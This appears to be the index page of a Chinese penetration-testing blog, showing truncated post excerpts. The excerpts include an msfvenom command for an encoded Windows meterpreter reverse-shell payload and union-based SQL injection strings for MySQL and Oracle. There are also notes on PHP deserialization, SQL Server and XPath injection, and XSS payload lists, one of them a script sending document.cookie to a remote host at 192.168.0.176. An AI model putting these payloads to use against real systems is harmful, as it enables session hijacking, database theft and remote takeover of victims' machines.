摘要: 前某厂混子,日常打杂 溯源到ID或者真实信息均与本人无关。 本博客仅供技术交流参考之用,请严格遵守当地法律法规,请勿使用博客中的技术进行违法犯罪操作,一旦触犯法律与本人无关。 阅读全文
posted @ 2023-04-10 09:30 幻-心 阅读(24) 评论(0) 推荐(0)
摘要: IP端口探测 nmap 10.10.11.189 -A -sV -sS -O -v Nmap scan report for 10.10.11.189 Host is up (0.35s latency). Not shown: 998 closed tcp ports (reset) PORT S 阅读全文
posted @ 2023-04-03 16:23 幻-心 阅读(116) 评论(0) 推荐(0)
摘要: windows: msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 - 阅读全文
posted @ 2023-02-26 21:59 幻-心 阅读(185) 评论(0) 推荐(0)
摘要: 联合注入 查数据库 union select null,schema_name,null from information_schema.schemata limit 1,1%23 查数据表: union select 1,table_name,3 from information_schema.t 阅读全文
posted @ 2023-02-26 21:57 幻-心 阅读(40) 评论(0) 推荐(0)
摘要: 获取数据库版本 union select 1,'a',(SELECT banner FROM v$version WHERE banner LIKE 'Oracle%25') from dual -- + 获取操作系统版本 union select 1,'a',(SELECT banner FROM 阅读全文
posted @ 2023-02-26 21:56 幻-心 阅读(60) 评论(0) 推荐(0)
摘要: 用户数据在$_SESSION中存储,当用户数据过大,内存占用过大,为了节省内存,选择把用户数据存储在文件中,即使用serialize()函数把用户数据存储到文件中,在使用的时候,在通过unserialize()函数调用 漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过 阅读全文
posted @ 2023-02-26 21:56 幻-心 阅读(41) 评论(0) 推荐(0)
摘要: SQLServer有三个权限级别: sa权限:数据库操作,文件管理,命令执行,注册表读取等system。SQLServer数据库的最高权限 db权限:文件管理,数据库操作等权限 users-administrators public权限:数据库操作 guest-users 判断是否是SA权限 sel 阅读全文
posted @ 2023-02-26 21:56 幻-心 阅读(225) 评论(0) 推荐(0)
摘要: Xpath注入原理: XPath注入攻击主要是通过构建特殊的输入,这些输入往往是XPath语法中的一些组合,这些输入将作为参数传入Web 应用程序,通过执行XPath查询而执行入侵者想要的操作,但是,注入的对象不是数据库users表了,而是一个存储数据的XML文件。 攻击者可以获取 XML 数据的组 阅读全文
posted @ 2023-02-26 21:55 幻-心 阅读(404) 评论(0) 推荐(0)
摘要: 常规payload <script>alert(1);</script> <script>prompt(1);</script> <script>confirm(1);</script> <scRipT>alert(999999)</ScriPt> <script src="http://xss.c 阅读全文
posted @ 2023-02-26 21:55 幻-心 阅读(33) 评论(0) 推荐(0)
摘要: 盲打cookie payload <script>document.location='http://192.168.0.176/Hcookie.php?cookie='+document.cookie;</script> <img src='http://192.168.0.176/Hcookie 阅读全文
posted @ 2023-02-26 21:55 幻-心 阅读(29) 评论(0) 推荐(0)